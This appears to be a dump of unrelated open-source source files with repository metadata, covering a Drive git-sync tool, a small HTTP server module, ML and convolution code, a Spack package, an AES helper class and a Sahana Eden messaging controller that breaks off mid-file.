google.F_TRASHED: gBundleFile[google.F_TRASHED],
google.F_SIZE: gBundleFile[google.F_SIZE],
gitLib.FT_HEAD: head,
}
utilities.writeJson(metadata, repoMetadataPath)
def printMetadata(self, gBundleFile):
return ("ID: " + gBundleFile[google.F_ID] +
", Name: '" + gBundleFile[google.F_NAME] +
"', Version: " + gBundleFile[google.F_VERSION] +
", Size: " + gBundleFile[google.F_SIZE] +
" B (" + utilities.humansize(gBundleFile[google.F_SIZE]) + ")")
def getGoogleApi(self):
"""Return an instance of the google api object"""
if self._gapi is None:
self._gapi = google.GoogleServiceApi()
return self._gapi
def readMetadata(self):
return utilities.readJson(self._pathLib.getJsonFilePath())
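# Hedged usage sketch (not part of the tool itself; assumes Google Drive
# credentials and the command-line arguments expected by args.Arguments()
# are already configured):
#
#     repo = RepoLib()
#     repo.repoVersion()   # show the bundle version currently stored on drive
#     repo.sync()          # download the bundle and fetch it into the local repo
#     repo.push()          # bundle local commits and upload a new drive revision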
|
lukegeorg/DriveGitRepo
|
core/repoLib.py
|
Python
|
gpl-3.0
| 8,256
|
# -*- coding: utf-8 -*-
##################################################################
# pyHTTPd
# $Id$
# (c) 2006 by Tim Taubert
##################################################################
import os
from xml.dom import minidom
from baseConfig import pConfig
class htaccess:
active = False
def __init__(self):
return
def before_GET(self, httpd):
htfile = self.findhtaccessFile(pConfig.getValue("base.docroot")+httpd.path)
if htfile:
self.parsehtaccessFile(htfile)
self.active = True
def findhtaccessFile(self, path):
if not os.path.isdir(path) or path.endswith("/"):
path = "/".join(path.split("/")[:-1])
while os.path.isdir(path):
if os.path.isfile(path+"/.htaccess"):
return path+"/.htaccess"
path = "/".join(path.split("/")[:-1])
return False
def parsehtaccessFile(self, htfile):
xmldoc = minidom.parse(htfile)
xmldoc = xmldoc.getElementsByTagName("config")[0]
|
BackupTheBerlios/pyhttpd-svn
|
core/modules/htaccess/htaccess.py
|
Python
|
gpl-2.0
| 922
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DisableSecretVersion
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-secretmanager
# [START secretmanager_v1_generated_SecretManagerService_DisableSecretVersion_async]
from google.cloud import secretmanager_v1
async def sample_disable_secret_version():
# Create a client
client = secretmanager_v1.SecretManagerServiceAsyncClient()
# Initialize request argument(s)
request = secretmanager_v1.DisableSecretVersionRequest(
name="name_value",
)
# Make the request
response = await client.disable_secret_version(request=request)
# Handle the response
print(response)
# [END secretmanager_v1_generated_SecretManagerService_DisableSecretVersion_async]
|
googleapis/python-secret-manager
|
samples/generated_samples/secretmanager_v1_generated_secret_manager_service_disable_secret_version_async.py
|
Python
|
apache-2.0
| 1,560
|
class Gene:
def __init__(self, name, system, loner, profile):
self.name = name
self.profile = profile
self._system = system
self._loner = loner
@property
def system(self):
"""
:return: the System that owns this Gene
:rtype: :class:`macsypy.system.System` object
"""
return self._system
def __eq__(self, gene):
"""
:return: True if the gene names (gene.name) are the same, False otherwise.
:param gene: the query of the test
:type gene: :class:`macsypy.gene.Gene` object.
:rtype: boolean.
"""
return self.name == gene.name
class Homolog(Gene):
def __init__(self, name, system, loner, profile, gene_ref, aligned=False):
super(Homolog, self).__init__(name, system, loner, profile)
self.ref = gene_ref
self.aligned = aligned
@property
def system(self):
"""
:return: the System that owns this Gene
:rtype: :class:`macsypy.system.System` object
"""
return self._system
def __eq__(self, gene):
"""
:return: True if the gene names (gene.name) are the same, False otherwise.
:param gene: the query of the test
:type gene: :class:`macsypy.gene.Gene` object.
:rtype: boolean.
"""
return self.name == gene.name
def is_aligned(self):
"""
:return: True if this gene homolog is aligned to its homolog, False otherwise.
:rtype: boolean
"""
return self.aligned
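# Hedged usage sketch (assumes Python 3; every name below is invented for
# illustration, and plain strings stand in for real System objects):
if __name__ == '__main__':
    sctN = Gene('sctN', system='T3SS', loner=False, profile='sctN.hmm')
    flgB = Homolog('flgB', system='Flagellum', loner=False,
                   profile='flgB.hmm', gene_ref=sctN, aligned=True)
    print(flgB == sctN)       # False: the gene names differ
    print(flgB.is_aligned())  # True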
|
bioinfo-center-pasteur-fr/python-course-1
|
source/_static/code/homolog.py
|
Python
|
cc0-1.0
| 1,585
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Zziplib(AutotoolsPackage):
"""The zziplib provides read access to zipped files in a zip-archive, using
compression based solely on free algorithms provided by zlib. It also
provides a functionality to overlay the archive filesystem with the
filesystem of the operating system environment."""
homepage = "https://github.com/gdraheim/zziplib"
url = "https://github.com/gdraheim/zziplib/archive/v0.13.69.tar.gz"
# Switch to CMake from 0.13.70, first working release is 0.13.71
version('0.13.72', sha256='93ef44bf1f1ea24fc66080426a469df82fa631d13ca3b2e4abaeab89538518dc')
version('0.13.69', sha256='846246d7cdeee405d8d21e2922c6e97f55f24ecbe3b6dcf5778073a88f120544')
patch('python2to3.patch', when='@:0.13.69')
build_directory = 'spack-build'
depends_on('python@3.5:', type='build', when='@0.13.71:')
depends_on('cmake', type='build', when='@0.13.71:')
depends_on('python', type='build')
depends_on('zlib')
# see zzip/CMakeLists.txt
depends_on('coreutils', type='build', when='@0.13.71:')
depends_on('pkgconfig', type='build', when='@0.13.71:')
@when('@0.13.71:')
def autoreconf(self, spec, prefix):
touch('configure')
@when('@0.13.71:')
def _cmake_args(self):
spec = self.spec
args = []
zlib = spec['zlib']
# Do not use self.define('VAR', path) unless a CMakePackage
args.extend([
'-DZLIB_LIBRARY:FILEPATH={0}'.format(zlib.libs[0]),
'-DZLIB_INCLUDE_DIR:FILEPATH={0}'.format(zlib.headers.directories[0])
])
args.append('-DPYTHON_EXECUTABLE:FILEPATH={0}'.format(
spec['python'].command.path))
args.append('-DCMAKE_INSTALL_PREFIX:PATH={0}'.format(spec.prefix))
return args
def configure_args(self):
args = ['--with-zlib={0}'.format(self.spec['zlib'].prefix)]
return args
@when('@0.13.71:')
def configure(self, spec, prefix):
with working_dir('spack-build', create=True):
cmake_args = self._cmake_args()
cmake('..', *cmake_args)
|
LLNL/spack
|
var/spack/repos/builtin/packages/zziplib/package.py
|
Python
|
lgpl-2.1
| 2,327
|
import base64
from Crypto.Cipher import AES
class Crypt(object):
"""
Class for AES256 encryption
"""
def __init__(self, key, iv):
self._key = key
self._iv = iv
self._mode = AES.MODE_CBC
self._block_size = AES.block_size
def pad(self, s):
return s + b"\0" * (self._block_size - len(s) % self._block_size)
def aes_encrypt(self, plain_text):
"""
AES256 encryption
Uses AES256 to encrypt a string and encodes the result in base64
:param plain_text:
:return:
"""
encryptor = AES.new(self._key, self._mode, self._iv)
padded_text = self.pad(plain_text.encode('utf-8'))
return base64.b64encode(encryptor.encrypt(padded_text))
def aes_decrypt(self, cipher_text):
"""
AES256 decryption
Base64-decodes the string and uses AES256 to decrypt it
:param cipher_text:
:return:
"""
decryptor = AES.new(self._key, self._mode, self._iv)
plain_text = decryptor.decrypt(base64.b64decode(cipher_text))
return plain_text.rstrip(b"\0").decode('utf-8')
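# Hedged usage sketch (not part of the SDK): AES-256-CBC needs a 32-byte key
# and a 16-byte IV; the values below are placeholders, not real secrets.
if __name__ == '__main__':
    demo_key = b'0' * 32  # hypothetical 32-byte key
    demo_iv = b'1' * 16   # hypothetical 16-byte IV
    crypt = Crypt(demo_key, demo_iv)
    token = crypt.aes_encrypt('message de test')
    assert crypt.aes_decrypt(token) == 'message de test'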
|
NextINpact/LaPresseLibreSDK
|
python_django/sdk_lpl/utils/crypt.py
|
Python
|
mit
| 1,192
|
from distutils.core import setup
requires = [
'rsa>=3.4.2',
'requests>=2.11.1'
]
VERSION='0.7'
setup(
name = 'bankson',
packages = ['bankson'],
version = VERSION,
install_requires=requires,
description = 'Bankson API client',
author = 'Codesense',
author_email = 'niklas@codesense.fi',
url = 'https://github.com/banksonfi/bankson-python',
download_url = 'https://github.com/banksonfi/bankson-python/tarball/' + VERSION,
keywords = ['bankson'], # arbitrary keywords
classifiers = [],
)
|
banksonfi/bankson-python
|
setup.py
|
Python
|
mit
| 526
|
import urllib2
import json
header = '''
<header class="navbar navbar-static-top bs-docs-nav" id="top" role="banner" style="background-color:rgba(2,132,130,0.7); z-index: 9;">
<div class="container">
<div class="navbar-header">
<a href="../" class="navbar-brand">XBT WALLET</a>
</div>
<nav class="collapse navbar-collapse bs-navbar-collapse" role="navigation">
<ul class="nav navbar-nav" >
<li><a href="/wallet">WALLET</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li><a href="/Logout">LOGOUT</a></li>
</ul>
</nav>
</div>
</header>
'''
footer = '''
<script src="/static/bootstrap.min.js"></script>
'''
def getHeader(pageRoute="/"):
return header
def getFooter(pageRoute="/"):
return footer
|
liezl200/xbtwallet
|
header.py
|
Python
|
mit
| 773
|
#!/usr/bin/python
# compute new sensitivity from formulae in manual
import math
print "Tilt Sensitivity Calculator"
print "X1 refers to the tilt measurement, in arc sec"
print "R0/R1 refer to the gravimeter readings, in mGal"
print "Get the current tilt sensitivity from data files or the Setup menu"
oldSens = float(raw_input("Current tilt sensitivity: "))
r0 = float(raw_input("R0 [mGal] : "))
r1 = float(raw_input("R1 [mGal] : "))
x1 = float(raw_input("X1 [arc sec]: "))
K = math.sqrt( 1 + (87000 * (r0-r1)/(x1*x1)) )
newSens = K * oldSens
print "New tilt Sensitivity: %f"%newSens
|
inkenbrandt/Earth_Tides
|
Micrograv/util/tilt_sens.py
|
Python
|
gpl-2.0
| 593
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for neural_epsilon_greedy_agent.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.bandits.agents import neural_epsilon_greedy_agent
from tf_agents.bandits.networks import global_and_arm_feature_network
from tf_agents.bandits.specs import utils as bandit_spec_utils
from tf_agents.networks import network
from tf_agents.specs import tensor_spec
from tf_agents.trajectories import time_step as ts
class DummyNet(network.Network):
def __init__(self, observation_spec, action_spec, name=None):
super(DummyNet, self).__init__(observation_spec, state_spec=(), name=name)
action_spec = tf.nest.flatten(action_spec)[0]
num_actions = action_spec.maximum - action_spec.minimum + 1
# Store custom layers that can be serialized through the Checkpointable API.
self._dummy_layers = [
tf.keras.layers.Dense(
num_actions,
kernel_initializer=tf.constant_initializer([[1, 1.5, 2],
[1, 1.5, 4]]),
bias_initializer=tf.constant_initializer([[1], [1], [-10]]))
]
def call(self, inputs, step_type=None, network_state=()):
del step_type
inputs = tf.cast(inputs, tf.float32)
for layer in self._dummy_layers:
inputs = layer(inputs)
return inputs, network_state
class AgentTest(tf.test.TestCase):
def setUp(self):
super(AgentTest, self).setUp()
tf.compat.v1.enable_resource_variables()
self._obs_spec = tensor_spec.TensorSpec([2], tf.float32)
self._time_step_spec = ts.time_step_spec(self._obs_spec)
self._action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), minimum=0, maximum=2)
self._observation_spec = self._time_step_spec.observation
def testPolicyWithEpsilonGreedy(self):
reward_net = DummyNet(self._observation_spec, self._action_spec)
agent = neural_epsilon_greedy_agent.NeuralEpsilonGreedyAgent(
self._time_step_spec,
self._action_spec,
reward_network=reward_net,
optimizer=None,
epsilon=0.1)
observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
time_steps = ts.restart(observations, batch_size=2)
policy = agent.policy
action_step = policy.action(time_steps)
# Batch size 2.
self.assertAllEqual([2], action_step.action.shape)
self.evaluate(tf.compat.v1.global_variables_initializer())
actions = self.evaluate(action_step.action)
self.assertIn(actions[0], [0, 1, 2])
self.assertIn(actions[1], [0, 1, 2])
def testPolicyWithEpsilonGreedyAndActionMask(self):
reward_net = DummyNet(self._observation_spec, self._action_spec)
obs_spec = (tensor_spec.TensorSpec([2], tf.float32),
tensor_spec.TensorSpec([3], tf.int32))
agent = neural_epsilon_greedy_agent.NeuralEpsilonGreedyAgent(
ts.time_step_spec(obs_spec),
self._action_spec,
reward_network=reward_net,
optimizer=None,
observation_and_action_constraint_splitter=lambda x: (x[0], x[1]),
epsilon=0.1)
observations = (tf.constant([[1, 2], [3, 4]], dtype=tf.float32),
tf.constant([[0, 0, 1], [0, 1, 0]], dtype=tf.int32))
time_steps = ts.restart(observations, batch_size=2)
policy = agent.policy
action_step = policy.action(time_steps)
# Batch size 2.
self.assertAllEqual([2], action_step.action.shape)
self.evaluate(tf.compat.v1.global_variables_initializer())
actions = self.evaluate(action_step.action)
self.assertAllEqual(actions, [2, 1])
def testTrainPerArmAgent(self):
obs_spec = bandit_spec_utils.create_per_arm_observation_spec(2, 3, 3)
time_step_spec = ts.time_step_spec(obs_spec)
reward_net = (
global_and_arm_feature_network.create_feed_forward_common_tower_network(
obs_spec, (4, 3), (3, 4), (4, 2)))
optimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=0.1)
agent = neural_epsilon_greedy_agent.NeuralEpsilonGreedyAgent(
time_step_spec,
self._action_spec,
reward_network=reward_net,
optimizer=optimizer,
epsilon=0.1,
accepts_per_arm_features=True)
observations = {
bandit_spec_utils.GLOBAL_FEATURE_KEY:
tf.constant([[1, 2], [3, 4]], dtype=tf.float32),
bandit_spec_utils.PER_ARM_FEATURE_KEY:
tf.cast(
tf.reshape(tf.range(18), shape=[2, 3, 3]), dtype=tf.float32)
}
time_steps = ts.restart(observations, batch_size=2)
policy = agent.policy
action_step = policy.action(time_steps)
self.evaluate(tf.compat.v1.initialize_all_variables())
actions = self.evaluate(action_step.action)
self.assertAllEqual(actions.shape, (2,))
if __name__ == '__main__':
tf.test.main()
|
tensorflow/agents
|
tf_agents/bandits/agents/neural_epsilon_greedy_agent_test.py
|
Python
|
apache-2.0
| 5,518
|
'''
Created by auto_sdk on 2015.11.04
'''
from top.api.base import RestApi
class LogisticsConsignResendRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.company_code = None
self.feature = None
self.is_split = None
self.out_sid = None
self.seller_ip = None
self.sub_tid = None
self.tid = None
def getapiname(self):
return 'taobao.logistics.consign.resend'
|
colaftc/webtool
|
top/api/rest/LogisticsConsignResendRequest.py
|
Python
|
mit
| 457
|
"""
convolutional nodes
"""
from __future__ import division, absolute_import
from __future__ import print_function, unicode_literals
import numpy as np
import theano
import theano.tensor as T
from .. import core
def conv_output_length(input_size, conv_size, stride, pad):
"""
calculates the output size along a single axis for a conv operation
"""
if input_size is None:
return None
without_stride = input_size + 2 * pad - conv_size + 1
# equivalent to np.ceil(without_stride / stride)
output_size = (without_stride + stride - 1) // stride
return output_size
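# Example (illustrative only): a 32-wide axis with a 3-wide kernel, stride 1 and
# pad 1 gives without_stride = 32 + 2 - 3 + 1 = 32 and output_size = 32 ("same"
# size); with stride 2 the same inputs give (32 + 2 - 1) // 2 = 16.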
def conv_output_shape(input_shape,
num_filters,
axes,
conv_shape,
strides,
pads):
"""
compute output shape for a conv
"""
output_shape = list(input_shape)
assert 1 not in axes
output_shape[1] = num_filters
for axis, conv_size, stride, pad in zip(axes,
conv_shape,
strides,
pads):
output_shape[axis] = conv_output_length(input_shape[axis],
conv_size,
stride,
pad)
return tuple(output_shape)
def conv_parse_pad(filter_size, pad):
if pad == "valid":
return (0,) * len(filter_size)
elif pad == "full":
return tuple([x - 1 for x in filter_size])
elif pad in ("same", "half"):
new_pad = []
for f in filter_size:
assert f % 2
new_pad += [f // 2]
return tuple(new_pad)
else:
assert len(pad) == len(filter_size)
return pad
@core.register_node("conv_2d")
class Conv2DNode(core.NodeImpl):
"""
node for 2D convolution
"""
hyperparameter_names = ("inits",
"num_filters",
"filter_size",
"conv_stride",
"stride",
"conv_pad",
"pad")
def compute_output(self, network, in_vw):
# gather hyperparameters
num_filters = network.find_hyperparameter(["num_filters"])
filter_size = network.find_hyperparameter(["filter_size"])
stride = network.find_hyperparameter(["conv_stride", "stride"], (1, 1))
pad = network.find_hyperparameter(["conv_pad", "pad"], "valid")
pad = conv_parse_pad(filter_size, pad)
# HACK figure out if this is necessary
# convert numerical pad to valid or full
# if pad == (0, 0):
# pad = "valid"
# elif pad == tuple([fs - 1 for fs in filter_size]):
# pad = "full"
# assert pad in ["valid", "full"]
assert len(filter_size) == 2
# create weight
num_channels = in_vw.shape[1]
filter_shape = (num_filters, num_channels) + tuple(filter_size)
W = network.create_vw(
name="weight",
is_shared=True,
shape=filter_shape,
tags={"parameter", "weight"},
default_inits=[],
).variable
out_var = T.nnet.conv2d(input=in_vw.variable,
filters=W,
input_shape=in_vw.shape,
filter_shape=filter_shape,
border_mode=pad,
subsample=stride)
out_shape = conv_output_shape(input_shape=in_vw.shape,
num_filters=num_filters,
axes=(2, 3),
conv_shape=filter_size,
strides=stride,
pads=pad)
network.create_vw(
"default",
variable=out_var,
shape=out_shape,
tags={"output"},
)
@core.register_node("conv_3d")
class Conv3DNode(core.NodeImpl):
"""
node for 3D convolution
"""
hyperparameter_names = ("inits",
"num_filters",
"filter_size",
"conv_stride",
"stride",
"conv_pad",
"pad",
"include_bias")
def compute_output(self, network, in_vw):
# gather hyperparameters
num_filters = network.find_hyperparameter(["num_filters"])
filter_size = network.find_hyperparameter(["filter_size"])
stride = network.find_hyperparameter(["conv_stride", "stride"],
(1, 1, 1))
pad = network.find_hyperparameter(["conv_pad", "pad"], "valid")
include_bias = network.find_hyperparameter(["include_bias"], False)
assert len(filter_size) == 3
assert pad == "valid"
# create weight
num_channels = in_vw.shape[1]
filter_shape = (num_filters, num_channels) + tuple(filter_size)
W = network.create_vw(
name="weight",
is_shared=True,
shape=filter_shape,
tags={"parameter", "weight"},
default_inits=[],
).variable
# create bias
if include_bias:
b = network.create_vw(
name="bias",
is_shared=True,
shape=(num_filters,),
tags={"parameter", "bias"},
default_inits=[],
).variable
else:
b = T.zeros(num_filters)
from theano.tensor.nnet.Conv3D import conv3D
# conv3D takes V in order: (batch, row, column, time, in channel)
# and W in order: (out channel, row, column, time ,in channel)
# but we keep the dimensions that W is stored in consistent with other
# convolutions, so we have to dimshuffle here
out_var = conv3D(V=in_vw.variable.dimshuffle(0, 2, 3, 4, 1),
W=W.dimshuffle(0, 2, 3, 4, 1),
b=b,
d=stride)
out_shape = conv_output_shape(input_shape=in_vw.shape,
num_filters=num_filters,
axes=(2, 3, 4),
conv_shape=filter_size,
strides=stride,
pads=(0, 0, 0))
network.create_vw(
"default",
variable=out_var,
shape=out_shape,
tags={"output"},
)
@core.register_node("conv_3d2d")
class Conv3D2DNode(core.NodeImpl):
"""
performs 3D convolution via 2D convolution
see: theano.tensor.nnet.conv3d2d.conv3d
"""
hyperparameter_names = ("inits",
"num_filters",
"filter_size",
"conv_stride",
"stride",
"conv_pad",
"pad")
def compute_output(self, network, in_vw):
# gather hyperparameters
num_filters = network.find_hyperparameter(["num_filters"])
filter_size = network.find_hyperparameter(["filter_size"])
stride = network.find_hyperparameter(["conv_stride", "stride"],
(1, 1, 1))
pad = network.find_hyperparameter(["conv_pad", "pad"], "valid")
assert len(filter_size) == 3
assert pad == "valid"
assert stride == (1, 1, 1)
# create weight
num_channels = in_vw.shape[1]
filter_shape = (num_filters, num_channels) + tuple(filter_size)
W = network.create_vw(
name="weight",
is_shared=True,
shape=filter_shape,
tags={"parameter", "weight"},
default_inits=[],
).variable
from theano.tensor.nnet.conv3d2d import conv3d
# takes signals in order: (batch, time, channels, row, column)
# and filters in order: (out channel, time, in channels, row, column)
# but we keep the dimensions that W is stored in consistent with other
# convolutions, so we have to dimshuffle here
order = (0, 2, 1, 3, 4)
out_var = conv3d(signals=in_vw.variable.dimshuffle(*order),
filters=W.dimshuffle(*order),
signals_shape=[in_vw.shape[o] for o in order],
filters_shape=[filter_shape[o] for o in order],
# HACK as of 20150916, conv3d does a check
# if isinstance(border_mode, str), so we manually
# cast as a string
border_mode=str("valid"))
out_shape = conv_output_shape(input_shape=in_vw.shape,
num_filters=num_filters,
axes=(2, 3, 4),
conv_shape=filter_size,
strides=stride,
pads=conv_parse_pad(filter_size, pad))
network.create_vw(
"default",
variable=out_var,
shape=out_shape,
tags={"output"},
)
|
diogo149/treeano
|
treeano/nodes/conv.py
|
Python
|
apache-2.0
| 9,525
|
# -*- coding: utf-8 -*-
"""
Messaging Module - Controllers
"""
if not settings.has_module(c):
raise HTTP(404, body="Module disabled: %s" % c)
# -----------------------------------------------------------------------------
def index():
""" Module's Home Page """
module_name = settings.modules[c].get("name_nice")
response.title = module_name
return {"module_name": module_name,
}
# -----------------------------------------------------------------------------
def basestation():
""" RESTful CRUD controller for Base Stations """
# Pre-processor
def prep(r):
# Function to call for all Site Instance Types
from s3db.org import org_site_prep
org_site_prep(r)
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def compose():
""" Compose a Message which can be sent to a pentity via a number of different communications channels """
return msg.compose()
# =============================================================================
def message():
"""
RESTful CRUD controller for the master message log
"""
tablename = "msg_message"
table = s3db.msg_message
table.instance_type.readable = True
table.instance_type.label = T("Channel")
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Message Details"),
title_list = T("Message Log"),
label_list_button = T("View Message Log"),
msg_list_empty = T("No Messages currently in the Message Log"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons
s3.actions += [{"label": s3_str(T("Mark Sender")),
"url": URL(f = "mark_sender",
args = ["[id]"],
),
"_class": "action-btn",
},
]
return output
s3.postp = postp
s3db.configure(tablename,
deletable = False,
editable = False,
insertable = False,
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
def contact():
"""
RESTful CRUD controller for the Contact Form
"""
def prep(r):
if not auth.s3_has_role("ADMIN"):
r.method = "create"
return True
s3.prep = prep
return s3_rest_controller()
# =============================================================================
def mark_sender():
"""
Assign priority to the given sender
"""
try:
mid = request.args[0]
except:
raise SyntaxError
mtable = s3db.msg_message
stable = s3db.msg_sender
# @ToDo: Replace 2 queries with Join
srecord = db(mtable.id == mid).select(mtable.from_address,
limitby = (0, 1),
).first()
sender = srecord.from_address
record = db(stable.sender == sender).select(stable.id,
limitby = (0, 1),
).first()
if record:
args = "update"
else:
args = "create"
redirect(URL(f = "sender",
args = args,
vars = {"sender": sender},
))
# =============================================================================
def outbox():
""" View the contents of the Outbox """
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
from s3db.pr import pr_PersonEntityRepresent
tablename = "msg_outbox"
table = s3db[tablename]
table.message_id.label = T("Message")
table.message_id.writable = False
table.message_id.readable = True
table.pe_id.readable = True
table.pe_id.label = T("Recipient")
table.message_id.represent = s3db.msg_message_represent
table.pe_id.represent = pr_PersonEntityRepresent(default_label = "")
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Message Details"),
title_list = T("Outbox"),
label_list_button = T("View Outbox"),
label_delete_button = T("Delete Message"),
msg_record_deleted = T("Message deleted"),
msg_list_empty = T("No Messages currently in Outbox"),
)
def postp(r, output):
if isinstance(output, dict):
add_btn = A(T("Compose"),
_class = "action-btn",
_href = URL(f="compose"),
)
output["rheader"] = add_btn
return output
s3.postp = postp
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
def email_outbox():
"""
RESTful CRUD controller for the Email Outbox
- all Outbound Email Messages are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_email"
table = s3db.msg_email
s3.filter = (table.inbound == False)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Email Details"),
title_list = T("Sent Emails"),
label_list_button = T("View Sent Emails"),
label_delete_button = T("Delete Email"),
msg_record_deleted = T("Email deleted"),
msg_list_empty = T("No Emails currently in Outbox"),
)
def postp(r, output):
if isinstance(output, dict):
add_btn = A(T("Compose"),
_class = "action-btn",
_href = URL(f="compose"),
)
output["rheader"] = add_btn
return output
s3.postp = postp
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
listadd = False,
list_fields = ["date",
"to_address",
"subject",
"body",
],
)
return s3_rest_controller(c, "email")
# -----------------------------------------------------------------------------
def facebook_outbox():
"""
RESTful CRUD controller for the Facebook Outbox
- all Outbound Facebook Messages are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_facebook"
table = s3db.msg_facebook
s3.filter = (table.inbound == False)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Post Details"),
title_list = T("Sent Posts"),
label_list_button = T("View Sent Posts"),
label_delete_button = T("Delete Post"),
msg_record_deleted = T("Post deleted"),
msg_list_empty = T("No Posts currently in Outbox"),
)
#def postp(r, output):
# if isinstance(output, dict):
# add_btn = A(T("Compose"),
# _class="action-btn",
# _href=URL(f="compose")
# )
# output["rheader"] = add_btn
# return output
#s3.postp = postp
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
listadd = False,
list_fields = ["date",
#"to_address",
"body",
],
)
return s3_rest_controller(c, "facebook")
# -----------------------------------------------------------------------------
def sms_outbox():
"""
RESTful CRUD controller for the SMS Outbox
- all sent SMS are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_sms"
table = s3db.msg_sms
s3.filter = (table.inbound == False)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("SMS Details"),
title_list = T("Sent SMS"),
label_list_button = T("View Sent SMS"),
label_delete_button = T("Delete SMS"),
msg_record_deleted = T("SMS deleted"),
msg_list_empty = T("No SMS currently in Outbox"),
)
def postp(r, output):
if isinstance(output, dict):
add_btn = A(T("Compose"),
_class = "action-btn",
_href = URL(f="compose"),
)
output["rheader"] = add_btn
return output
s3.postp = postp
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
listadd = False,
list_fields = ["date",
"to_address",
"body",
],
)
return s3_rest_controller(c, "sms")
# -----------------------------------------------------------------------------
def twitter_outbox():
"""
RESTful CRUD controller for the Twitter Outbox
- all sent Tweets are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_twitter"
table = s3db.msg_twitter
s3.filter = (table.inbound == False)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Tweet Details"),
title_list = T("Sent Tweets"),
label_list_button = T("View Sent Tweets"),
label_delete_button = T("Delete Tweet"),
msg_record_deleted = T("Tweet deleted"),
msg_list_empty = T("No Tweets currently in Outbox"),
)
def postp(r, output):
if isinstance(output, dict):
add_btn = A(T("Compose"),
_class = "action-btn",
_href = URL(f="compose"),
)
output["rheader"] = add_btn
return output
s3.postp = postp
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
listadd = False,
list_fields = ["date",
"to_address",
"body",
],
)
return s3_rest_controller(c, "twitter")
# =============================================================================
def inbox():
"""
RESTful CRUD controller for the Inbox
- all Inbound Messages are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
table = s3db.msg_message
s3.filter = (table.inbound == True)
table.inbound.readable = False
tablename = "msg_message"
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Message Details"),
title_list = T("InBox"),
label_list_button = T("View InBox"),
label_delete_button = T("Delete Message"),
msg_record_deleted = T("Message deleted"),
msg_list_empty = T("No Messages currently in InBox"),
)
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
list_fields = ["date",
"channel_id",
"from_address",
"body",
],
)
return s3_rest_controller(c, "message")
# -----------------------------------------------------------------------------
def email_inbox():
"""
RESTful CRUD controller for the Email Inbox
- all Inbound Email Messages are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
s3.filter = (FS("inbound") == True)
from s3 import S3SQLCustomForm, S3SQLInlineComponent
crud_form = S3SQLCustomForm("date",
"subject",
"from_address",
"body",
S3SQLInlineComponent(
"attachment",
name = "document_id",
label = T("Attachments"),
fields = ["document_id",],
),
)
tablename = "msg_email"
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Email Details"),
title_list = T("Email InBox"),
label_list_button = T("View Email InBox"),
label_delete_button = T("Delete Email"),
msg_record_deleted = T("Email deleted"),
msg_list_empty = T("No Emails currently in InBox"),
)
s3db.configure(tablename,
crud_form = crud_form,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
list_fields = ["date",
"from_address",
"subject",
"body",
